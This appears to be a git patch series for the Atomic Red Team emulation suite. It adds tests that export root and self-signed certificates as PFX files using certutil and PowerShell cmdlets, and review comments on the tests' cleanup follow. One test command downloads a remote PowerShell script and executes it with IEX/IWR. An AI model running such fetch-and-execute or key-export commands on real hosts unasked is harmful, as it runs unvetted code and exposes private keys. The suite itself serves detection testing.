From 599e147cfd88c38d9cc1358048d530cb9547c552 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 4 Feb 2023 05:55:40 -0700
Subject: [PATCH 1/2] ExportPFX

---
 atomics/T1552.004/T1552.004.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index 9fe68db7..a258c346 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -197,3 +197,18 @@ atomic_tests:
 Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
 Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
 name: powershell
+- name: CertUtil ExportPFX
+ description: |
+ The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+ Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+ Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
+ certutil -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\temp\atomic.pfx
+ cleanup_command: |
+ Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
+ name: powershell
+ elevation_required: true
\ No newline at end of file

From c0bba5e5ec711177d2fff2ade81535bf33014c3a Mon Sep 17 00:00:00 2001
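Review bot: The cleanup_command of the new 'CertUtil ExportPFX' test removes the certificate from the store but never deletes the file written by `certutil -exportPFX`, so c:\temp\atomic.pfx (a PFX, which bundles the private key when one is present) outlives the test; add `Remove-Item -Path c:\temp\atomic.pfx -ErrorAction Ignore` to the cleanup. The same gap is still present after the second patch in this series, where the path becomes #{output}, and in the two tests that patch adds. Nothing creates c:\temp before certutil writes to it, so the command fails on a host without that directory; the tests added in the second patch default to $env:Temp, which always exists. The IEX/IWR line runs RemoteCertTrust.ps1 fetched from the master branch at run time, so what the test does can change between runs without any change to this file; referencing a specific commit in the URL would pin it.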
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 4 Feb 2023 06:36:46 -0700
Subject: [PATCH 2/2] Update T1552.004.yaml

---
 atomics/T1552.004/T1552.004.yaml | 66 ++++++++++++++++++++++++++++++--
 1 file changed, 63 insertions(+), 3 deletions(-)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index a258c346..83b06ab3 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -199,16 +199,76 @@ atomic_tests:
 name: powershell
 - name: CertUtil ExportPFX
 description: |
- The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+ The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
 Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
 Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+ Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
 supported_platforms:
 - windows
+ input_arguments:
+ output:
+ description: file path to export to
+ type: Path
+ default: c:\temp\atomic.pfx
+ password:
+ description: password for cert
+ type: String
+ default: password
 executor:
 command: |
 IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing)
- certutil -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\temp\atomic.pfx
+ certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
 cleanup_command: |
 Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item
 name: powershell
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Export Root Certificate with Export-PFXCertificate
+ description: |
+ Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+ Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+ supported_platforms:
+ - windows
+ input_arguments:
+ pfx_path:
+ description: output path of the certificate
+ type: String
+ default: $env:Temp\atomicredteam.pfx
+ executor:
+ command: |
+ $mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+ $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+ Set-Location Cert:\LocalMachine\My
+ Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+ cleanup_command: |
+ try {
+ $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ } catch { }
+ name: powershell
+ elevation_required: true
+- name: Export Root Certificate with Export-Certificate
+ description: |
+ Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+ Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+ supported_platforms:
+ - windows
+ input_arguments:
+ pfx_path:
+ description: Path of the certificate
+ type: Path
+ default: $env:Temp\AtomicRedTeam.cer
+ executor:
+ command: |
+ $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+ Set-Location Cert:\LocalMachine\My
+ Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+ cleanup_command: |
+ try {
+ $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+ }
+ catch { }
+ name: powershell
+ elevation_required: true
\ No newline at end of file
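Review bot: The cleanup_command of 'Export Root Certificate with Export-PFXCertificate' recovers the thumbprint by calling `Import-Certificate` on the password-protected PFX the test just wrote; Import-Certificate is the cmdlet for .cer/.p7b-style files, so on a PFX this call likely throws, the empty `catch { }` swallows the error, and the self-signed certificate created in Cert:\LocalMachine\My is never removed (the Export-Certificate test uses the same re-import pattern). Looking the certificate up by subject avoids depending on the exported file at all: `Get-ChildItem Cert:\LocalMachine\My | Where-Object { $_.Subject -eq 'CN=atomicredteam.com' } | Remove-Item -ErrorAction Ignore`, followed by `Remove-Item -Path #{pfx_path} -ErrorAction Ignore` so the exported file does not outlive the test either. Both new descriptions say a Root certificate is created, yet New-SelfSignedCertificate is given `-CertStoreLocation cert:\LocalMachine\My`, and the second test writes a .cer through `Export-Certificate -Type CERT` while its argument is still named pfx_path and described as writing a pfx; the descriptions and the argument name should state what the commands actually do. The PFX password is hard-coded as "AtomicRedTeam" while the CertUtil test in this same hunk exposes it as the #{password} input argument; parameterizing it here too would keep the three tests consistent.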